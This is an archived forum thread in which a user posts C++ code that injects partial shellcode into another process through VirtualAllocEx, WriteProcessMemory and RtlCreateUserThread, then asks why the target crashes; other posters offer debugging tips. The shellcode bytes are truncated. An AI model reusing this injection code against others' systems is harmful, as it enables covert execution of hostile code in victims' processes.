PDA

View Full Version : RtlCreateUserThread best practices

capadleman
June 18th, 2013, 01:27
Hi guys
I have a shell code, used VirtualAlloc with MEM_COMMIT and PAGE_EXECUTE_READWRITE, then RtlCreateUserThread
the code is executed successfully but then the process crash with C000005 excption

I read aboud DEP, but I already used PAGE_EXECUTE_READWRITE !
I also tried calling ExitThread
How to avoid crashing the process ?
Thanks
Here is the code
Code:
RtlCreateUserThread=(_RtlCreateUserThread)GetProcAddress(ntdll,"RtlCreateUserThread";

    cin >>pid;

 

    HANDLE hProc=OpenProcess(PROCESS_ALL_ACCESS,false,pid);



	HANDLE code=VirtualAllocEx(hProc, NULL, 508 ,MEM_COMMIT , PAGE_EXECUTE_READWRITE);

	void * hex =	"\xe9\xff\x00\x00\x00\xe8\x1b\x01"

"\x00\x00\x77\x69\x6e\x69\x6e\x65"

"\x74\x2e\x64\x6c\x6c\x00\xe8\x1f"....

DWORD sizeofHex = 509;

	WriteProcessMemory(hProc,code,hex,sizeofHex,NULL);

	__try {

		RtlCreateUserThread(hProc,NULL,false,0,0,0, code,0,&hThd,&cid);

	}

	__except (GetExceptionCode() ){

		return -1;

	}

    WaitForSingleObject(hThd,INFINITE);

 

    CloseHandle(hThd);

    CloseHandle(hProc);
NeOXOeN
June 18th, 2013, 03:57
We are glad to help you with your question..


NeO
capadleman
June 18th, 2013, 04:01
OKay I updated my question Neo
NeOXOeN
June 18th, 2013, 04:30
any code maybe so ppl can have look what you did wrong? i will be just a little sarcastic.. i hope you will get the point what i am saying..

I have a BOOK, it uses VirtualAlloc with MEM_COMMIT and PAGE_EXECUTE_READWRITE, then RtlCreateUserThread
the code is executed successfully but then the process crash with C000005 exception.

I read aboud DEP, but I already used PAGE_EXECUTE_READWRITE !
I also tried calling ExitThread
How to avoid crashing the process ?... hmm maybe doing it right;O


I am not trying to be mean i am just trying to help...

bye NeO
capadleman
June 18th, 2013, 05:42
No problem, I'm at work now
so I need to get home to post the code
Indy
August 6th, 2013, 15:09
RtlCreateUserThread() - bad api. Use kernel32, because win32(not native). It makes no sense to mix..
_genuine
August 23rd, 2013, 11:49
Theres still alot of missing information here, so let me probe a bit.
First you should know that DEP is also a mechanism that can be enforced at the hardware level, trying to execute a shellcode on the stack regardless of whether youre using VirtualAlloc or not.
Also I didnt get a chance to see exactly what the shellcode is doing, but have you suspended the target process before trying to execute the shellcode? I can see issues with the current code youre using that may cause some undefined behavior, namely at the point at which the shellcode is trying to be executed via remoteThread.
Where is the shellcode being injected? Also try adding a check to see if the call to VirtualAllocEx even succeeded, it would be a shame if it didnt right?